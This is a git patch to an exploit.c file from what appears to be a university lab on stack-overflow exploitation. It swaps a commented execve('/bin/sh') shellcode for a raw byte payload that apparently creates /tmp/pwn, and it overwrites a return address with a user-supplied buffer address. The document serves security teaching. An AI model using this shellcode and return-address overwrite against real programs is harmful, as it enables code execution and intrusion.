From b818407fd0fb2b67528f2c4db04e43dd353e17a3 Mon Sep 17 00:00:00 2001
From: Yorick Barbanneau <ephase@xieme-art.org>
Date: Thu, 30 Mar 2023 02:08:40 +0200
Subject: [PATCH] Integrate shellcode

---
 .../files/q3/exploit.c                        | 45 +++----------------
 1 file changed, 6 insertions(+), 39 deletions(-)

diff --git a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/exploit.c b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/exploit.c
index 8895bbf..a06e163 100644
--- a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/exploit.c
+++ b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/exploit.c
@@ -1,36 +1,8 @@
 #include <stdlib.h>
 #include <stdio.h>
 
-
 unsigned char exploit[1024] = {
-	0x90, 0x90, 0x90, 0x90,		// A few nops for some margin
-	0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90,
-	0x90, 0x90, 0x90, 0x90,
-
-#ifdef __x86_64__
-	/* 64 bit version */
-	0xe8, 0x08, 0x00, 0x00, 0x00,	// push the address of what is next
-	'/','b','i','n','/','s','h','\0',
-	0x5f,				// pop the address
-	0x48, 0xc7, 0xc0, 0x3b, 0x00, 0x00, 0x00,	// execve system call
-	0x6a, 0x00,			// push NULL at the end of the array
-	0x48, 0x89, 0xe2,		// envp
-	0x57,				// push adress
-	0x48, 0x89, 0xe6,		// argv
-	0x0f, 0x05,			// system call!
-#else
-	/* 32 bit version */
-	0xe8, 0x08, 0x00, 0x00, 0x00,	// push the address of what is next
-	'/','b','i','n','/','s','h','\0',
-	0x5b,				// pop the adress
-	0xb8, 0x0b, 0x00, 0x00, 0x00,	// execve system call
-	0x6a, 0x00,			// push NULL at the end of the array
-	0x89, 0xe2,			// envp
-	0x53,				// push adress
-	0x89, 0xe1,			// argv
-	0xcd, 0x80,			// system call!
-#endif
+0xeb,0x24,0x48,0x31,0xff,0x5f,0x68,0xb6,0x01,0x00,0x00,0x48,0x31,0xf6,0x5e,0x6a,0x55,0x58,0x0f,0x05,0x48,0x31,0xc0,0x48,0x31,0xff,0x6a,0x2a,0x5f,0x6a,0x3d,0x58,0x48,0x8d,0x40,0xff,0x0f,0x05,0xe8,0xd7,0xff,0xff,0xff,0x2f,0x74,0x6d,0x70,0x2f,0x70,0x77,0x6e,0x00
 };
 
 int main(void) {
@@ -41,21 +13,16 @@ int main(void) {
 	fprintf(stderr,"Type the buf address printed by anodin\n");
 	scanf("%p", &ptr);
 
-	// Un peu de marge
-	ptr += 8;
-
 	// écraser l'adresse de retour
 	for (i = 0; i < 8; i++)
-		exploit_ptr[64/sizeof(void*)+i] = ptr;
-
-	for (i=0;i<sizeof(exploit);i++)
-		putchar(exploit[i]);
+	 	exploit_ptr[64/sizeof(void*)+i] = ptr;
+	
+    for (i=0;i<sizeof(exploit);i++)
+		putchar(exploit[i]);    
 
 	for (i=0;i<8192;i++)
-		putchar('\n');
+	 	putchar('\n');
 
-	printf("touch /tmp/ahah\n");
-	printf("echo \"I created file\" /tmp/ahah \\!\n");
 	fflush(stdout);
 
 	return 0;